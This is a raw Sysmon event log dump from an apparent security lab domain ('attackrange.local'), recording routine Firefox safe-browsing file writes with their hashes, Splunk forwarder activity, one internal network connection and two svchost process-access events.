Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\zh9k90mg.default-release\safebrowsing-updating\social-track-digest256.vlpsetMD5=16BF2AA546411BA25DC80EA288D47143,SHA256=524EC56C023155C7BE4C84D5AEC4FE2D85DFBAB3C2FA27F82BCD35028D546F83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291163Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.917{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\zh9k90mg.default-release\safebrowsing-updating\social-track-digest256.sbstoreMD5=69EE5B232870704AFCC0E8957AA42A0F,SHA256=EC8DF5279022B68C0B542EC1688889374754106DFADBF7CAF8337E3F98865941,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291162Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.901{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\zh9k90mg.default-release\safebrowsing-updating\mozstd-trackwhite-digest256.vlpsetMD5=1C82A0FCB1A71CF979139F4EA4782CDA,SHA256=678BBCB65B3773ED1DF2350A86067B6A8E93D749730509C5748088FB3AF85561,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291161Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.901{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\zh9k90mg.default-release\safebrowsing-updating\mozstd-trackwhite-digest256.sbstoreMD5=4229EE011D82D02008C80898F88BB589,SHA256=71E39823CAF19BE44C66DA1056A3DB3B18FE5DB46594A6EBBD41F6267503FAB9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291160Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.901{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\zh9k90mg.default-release\safebrowsing-updating\mozplugin-block-digest256.vlpsetMD5=FCC9C2C9B611A3264B68EBE180EB4248,SHA256=6ECD378A537EEFE350B45CFA353741383F407D99D776BF23155A7825DC5DD2BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291159Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.901{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\zh9k90mg.default-release\safebrowsing-updating\mozplugin-block-digest256.sbstoreMD5=519BEB1B01FC355BB388F1F75BE997FD,SHA256=FFE2D3077B81AE6F51B220C1C661B276C823FA67DAD1D64FC5F17249FC54BDC0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291158Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.901{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\zh9k90mg.default-release\safebrowsing-updating\google4\goog-unwanted-proto.vlpsetMD5=9C76EBB06B6B73B6F68E449B5B45A38F,SHA256=2486CEDF0A580D9C3D93753DB1A79E12C15D5A6AE1A3FB6D8B77DE1618809D75,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291157Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.901{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\zh9k90mg.default-release\safebrowsing-updating\google4\goog-unwanted-proto.metadataMD5=568BEE3B04C54991C316D831FCDF5AF6,SHA256=49758CD3418D25E9D3009DF58019AF86447C0DD16FFCDFD2AC241C7339CB9E43,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291156Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.901{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\zh9k90mg.default-release\safebrowsing-updating\google4\goog-phish-proto.vlpsetMD5=2236D49D2E2961540E4B6BA73AF2ADE3,SHA256=C8F1F40F933C1957190E466F8DFD00021A8F20A3721617729776824F8D44DBFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291155Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.848{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\zh9k90mg.default-release\safebrowsing-updating\google4\goog-phish-proto.metadataMD5=DE09FAB41B1A15A340B1DD1128CEE66C,SHA256=7A98DE1FAB89C08ADF0C3486A12FD0C20430BCB086F9B931ABC524F993FDE4F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291154Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.848{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\zh9k90mg.default-release\safebrowsing-updating\google4\goog-malware-proto.vlpsetMD5=39FE20DF3EC794C71F9DBC1AD7807D49,SHA256=A6084E298A4051DD7A5F596F48844A042F06DF4B081DE08086024B627A4F4595,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291153Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.848{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\zh9k90mg.default-release\safebrowsing-updating\google4\goog-malware-proto.metadataMD5=57C68C5F5A566D85A117A36860948C39,SHA256=B4615BC3ED907CD1DD6EAB2B48E33402E5B351A4716585BAB890F961274ED098,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291152Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.848{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\zh9k90mg.default-release\safebrowsing-updating\google4\goog-downloadwhite-proto.vlpsetMD5=EA86E0097B81FDBDEE3F12AC90CA6410,SHA256=6A242B62530E38DDCFD272643F6CC44EDC0208C69DC3022D6CC273F4C7E79AF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291151Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.848{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\zh9k90mg.default-release\safebrowsing-updating\google4\goog-downloadwhite-proto.metadataMD5=632D8A40F0EE7313A3593BDCA49C7720,SHA256=884F6F7915C9AC764CC3FAAED16DE3448050F5A50B117F110A22A6DDC510DE8F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291150Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.848{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\zh9k90mg.default-release\safebrowsing-updating\google4\goog-badbinurl-proto.vlpsetMD5=F7DFF9ADC0FA2A62164B6022DAFDD74F,SHA256=72AAAA96E9D360B51DD89823258E8EE0C9539996B88A64C208C3BCEEDF57DC95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291149Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.832{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\zh9k90mg.default-release\safebrowsing-updating\google4\goog-badbinurl-proto.metadataMD5=B0631079E861CF28491511891AE2FD8D,SHA256=3BDE649E9EC90FA04F22F84883D687AF6D7C9E8D38309CF8988F1BB7D7C01DCE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291148Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.832{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\zh9k90mg.default-release\safebrowsing-updating\google-trackwhite-digest256.vlpsetMD5=E54E5B84194EEE15E64D2A03F1136BB7,SHA256=07707B589BE3DBA3BB0BDAC67760A2B180EA3531E9D7976B73E4C1D8DF9DBB1E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291147Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.832{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\zh9k90mg.default-release\safebrowsing-updating\google-trackwhite-digest256.sbstoreMD5=FEC9BC354A7EE92C6FEEFE63E6B0FA26,SHA256=258EF8E6994A09FFB54BD0D5AFEC97C13C31F2EEFB7FE90A2A4C487C87817519,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291146Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.832{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\zh9k90mg.default-release\safebrowsing-updating\except-flashsubdoc-digest256.vlpsetMD5=0C0D67875BD75A0227C02DD8529BA01A,SHA256=614BE0169EC36E67223EB9645A98DA66DBFDE5DFBB89BB064F428AAEABDD9D97,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291145Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.832{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\zh9k90mg.default-release\safebrowsing-updating\except-flashsubdoc-digest256.sbstoreMD5=22698B4CF784DBBAE2D583F00491D43D,SHA256=3849563088AE0677D61702A1310FDE26DE5DDD846D53037222D3EFE012197BF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291144Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.817{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\zh9k90mg.default-release\safebrowsing-updating\except-flashallow-digest256.vlpsetMD5=7194B6BFF691A056852A51E2E06CE8FE,SHA256=CBE2DC6ABFE25BEAD60F4DFAF419FC0F441FF8A8DD4A2FEBF5553BE1CBD90C49,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291143Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.817{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\zh9k90mg.default-release\safebrowsing-updating\except-flashallow-digest256.sbstoreMD5=DD0458514C9A922B45DA6A8BEBE47320,SHA256=D27D5B27030F4725249377951BEB89E84A90A0E8241F0D5FD80EA59C1606E761,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291142Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.817{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\zh9k90mg.default-release\safebrowsing-updating\except-flash-digest256.vlpsetMD5=C2994D388F8780C87D35C352D9582985,SHA256=7ED09F7D2BD632F70077A4AE4F2BD2F3FB654B03CD72652F51678B0C7D027F25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291141Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.817{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\zh9k90mg.default-release\safebrowsing-updating\except-flash-digest256.sbstoreMD5=D5D6B4D59B4AE4E2DE4B40D0DA083571,SHA256=000E3A78C72A210CA3B5417A3CDD294FBCE2A31661601C9D594C75CF2800571C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291140Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.817{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\zh9k90mg.default-release\safebrowsing-updating\content-track-digest256.vlpsetMD5=07FF16BA9846838DA27AE094A1B91369,SHA256=DC83AE90504AC11C29876CFC48483976397E899958EE8EDE7F381971A2C2C4B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291139Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.817{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\zh9k90mg.default-release\safebrowsing-updating\content-track-digest256.sbstoreMD5=1B9A162CEB3C7BE8393CE348F35A4564,SHA256=2D6B6351BD1B8C2047DA1854D0033EE6C5CD9F1BFE38C5E1A2B82C86AFE8A598,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291138Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.817{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\zh9k90mg.default-release\safebrowsing-updating\block-flashsubdoc-digest256.vlpsetMD5=40165280FF1345B5241EC2A9D1DA2AF0,SHA256=F80BDD5341D8B1EE946E344E258EF2D35C3C0BB6B13EB7B3E6A77467DFA8B97F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291137Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.817{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\zh9k90mg.default-release\safebrowsing-updating\block-flashsubdoc-digest256.sbstoreMD5=B9556D03AFF392142AD5691D2F867310,SHA256=CFD3909B41C1EE3CBCB8B7D2B1378065E7D3B543FFF1F2FB7A4F25C5FF41722C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291136Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.817{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\zh9k90mg.default-release\safebrowsing-updating\block-flash-digest256.vlpsetMD5=130B9AC2BEEC5ADA274561105D81AE36,SHA256=7D99FEC08182A5B95D18D1569EDAA2C60C2AAFBD15A56D8882F22F3B395E6460,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291135Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.817{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\zh9k90mg.default-release\safebrowsing-updating\block-flash-digest256.sbstoreMD5=9F6B331AA1E070DCFEED473E76CE56C3,SHA256=7DBBEA2DD387EEB85E1F56E02FC9989ACDE570CD43BFEF2C2A827093BA87DA6D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291134Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.817{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\zh9k90mg.default-release\safebrowsing-updating\base-fingerprinting-track-digest256.vlpsetMD5=5D2B92240C8C7B21B696B5F4332ECC3D,SHA256=20F25748FF8ED62B5F8364C5B9141ECAB60BBFD35352A4613A75333D35F3D293,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291133Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.817{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\zh9k90mg.default-release\safebrowsing-updating\base-fingerprinting-track-digest256.sbstoreMD5=438CA2D8E476411D622FA556E3F6DFC8,SHA256=06CEBA967D57F01F6EC3E8A5677813CA650F21CD69BE83F8238749486A4D9A3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291132Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.817{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\zh9k90mg.default-release\safebrowsing-updating\base-cryptomining-track-digest256.vlpsetMD5=82E921320B62879B070EBE9D8F1F4256,SHA256=A781BFF04964067CB06EA80DA605A4A2837F7256580693C6DBDCA971D8C9BDB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291131Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.817{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\zh9k90mg.default-release\safebrowsing-updating\base-cryptomining-track-digest256.sbstoreMD5=BB9BB51CB484CC5719D210D53CF37762,SHA256=1903A36C25AEB3C61953484ED931ED52AB4A3BD13FCC38046154A6681472D499,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291130Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.817{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\zh9k90mg.default-release\safebrowsing-updating\analytics-track-digest256.vlpsetMD5=E5F58C529331DE1A7E3A96699C0AE92E,SHA256=698FD8CCC3F1B3A6D8CE8B2A580C277CAA34FAB0590FA0574AEF0025C0501FA5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291129Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.817{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\zh9k90mg.default-release\safebrowsing-updating\analytics-track-digest256.sbstoreMD5=F744ED601A4BEF57BC0FB538C0D51EEE,SHA256=8B3FB99021D4F6BD267897D15D3EBA7A3F5BB87125C8DB10F0FE362BB0CF140A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291128Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.817{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\zh9k90mg.default-release\safebrowsing-updating\allow-flashallow-digest256.vlpsetMD5=DE0D88480C24350C59E1E9A3583DE0D1,SHA256=01BA9F0B913E04ED10BD7166796483DD4F72005F249D6EE68B12117BE4B5D3C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291127Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.817{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\zh9k90mg.default-release\safebrowsing-updating\allow-flashallow-digest256.sbstoreMD5=DD0458514C9A922B45DA6A8BEBE47320,SHA256=D27D5B27030F4725249377951BEB89E84A90A0E8241F0D5FD80EA59C1606E761,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291126Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.817{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\zh9k90mg.default-release\safebrowsing-updating\ads-track-digest256.vlpsetMD5=BF207C6726A4D58C22C96E138046BD45,SHA256=B2C1380591B984CD3406C519DE0A2C2B8B040BFF216F68E44563B670F324C8F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291125Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.817{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\zh9k90mg.default-release\safebrowsing-updating\ads-track-digest256.sbstoreMD5=A165346B708E2F7C27647CF04ECD827C,SHA256=14B5D79CA80785F1B4C6993A2A65C123CDF324CA20E1434D6DC3CDE31970A89E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291124Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.801{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\zh9k90mg.default-release\safebrowsing-updating\google4\goog-badbinurl-proto.metadataMD5=B0631079E861CF28491511891AE2FD8D,SHA256=3BDE649E9EC90FA04F22F84883D687AF6D7C9E8D38309CF8988F1BB7D7C01DCE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291123Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.801{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\zh9k90mg.default-release\safebrowsing-updating\google4\goog-badbinurl-proto-1.vlpsetMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291122Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.748{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ED82152D2DC41C0A32430C71E758F42E,SHA256=650E4BC48DDBBBA1B8504F098E31CD401DF495932F5D628C49639BC9AD1EF93D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291121Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.732{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\zh9k90mg.default-release\safebrowsing-updating\google4\goog-unwanted-proto.metadataMD5=568BEE3B04C54991C316D831FCDF5AF6,SHA256=49758CD3418D25E9D3009DF58019AF86447C0DD16FFCDFD2AC241C7339CB9E43,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291120Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.732{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=675A37054347DCCF56D00AA11C7FD5E3,SHA256=8794ACD34AB6BA9805A49DC83007F8F407D30CBA55A08CC2ACE2978DD738DA93,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000439828Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:56.651{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62373-false10.0.1.12-8000- 23542300x8000000000000000439827Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:59.222{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=35E77510F16CFE6E51E078B1AF1BE24F,SHA256=6F85286D891BBC083B65E3BB317AE0E0B96E4BD39988FBACFE1D29312BA80C3B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439826Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:59.222{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1DDE4EB006298756689DF308E9C37481,SHA256=4197B01A7DDF5DBF9AE7412B679831EFDDD7C0C091FA5AFE2649D9F0A37F5B4D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439825Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:59.069{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439824Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:59.069{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 